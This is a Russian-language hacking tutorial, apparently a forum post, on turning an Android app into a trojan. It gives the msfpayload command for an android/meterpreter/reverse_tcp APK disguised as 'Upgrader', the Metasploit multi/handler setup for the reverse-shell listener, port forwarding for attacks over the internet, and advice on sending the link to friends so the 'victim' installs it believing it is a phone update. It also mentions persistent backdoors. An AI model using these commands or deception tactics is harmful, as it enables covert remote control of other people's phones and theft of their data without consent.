full
Х а к е р//
Я не вижу учебников, объясняющих этот взлом/эксплойт, поэтому я сделал один. (Тем не менее, вы, возможно, уже знаете об этом).
Fire-Up Kali:
- Откройте терминал и создайте троянский файл .apk
- Вы можете сделать это, набрав:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP) - Вы также можете взломать android в WAN, то есть через Interet, используя ваш публичный/внешний IP-адрес в LHOST и переадресацию портов (спросите меня о переадресации портов, если у вас есть проблемы в разделе комментариев).
Откройте другой терминал:
- Откройте другой терминал, пока файл не будет создан.
- Загрузите консоль metasploit, набрав: msfconsole
Настройте слушателя.
После загрузки (это займет время) загрузите эксплойт с несколькими обработчиками, набрав: use exploit/multi/handler
Установите (обратную) полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp
Exploit!
Наконец наберите: exploit, чтобы запустить слушателя.
Скопируйте созданное вами приложение (Upgrader.apk) из корневой папки на телефон Android.
Затем отправьте его с помощью загрузки на Dropbox или любой другой веб-сайт (например, www.speedyshare.com).
Затем отправьте ссылку, которую Веб-сайт дал вам своим друзьям, и используйте их телефоны (только в локальной сети, но если вы использовали метод WAN, вы можете использовать эксплойт в любом месте в Интернете).
Пусть Victim установит приложение Upgrader (так как он думает, что оно предназначено для обновления некоторых функций на его телефоне)
Тем не менее, в настройках безопасности телефона Android должна быть включена опция разрешения на установку приложений из неизвестных источников (если нет), чтобы троянец мог выполнить установку.
И когда он нажимает кнопку Open...
BOOM!
Приходит приглашение метра:
Некоторые почтовые модули, которые работают для Windows, могут не работать в Android.
Например: запустить killav, постоянство (постоянный бэкдор) и т.д.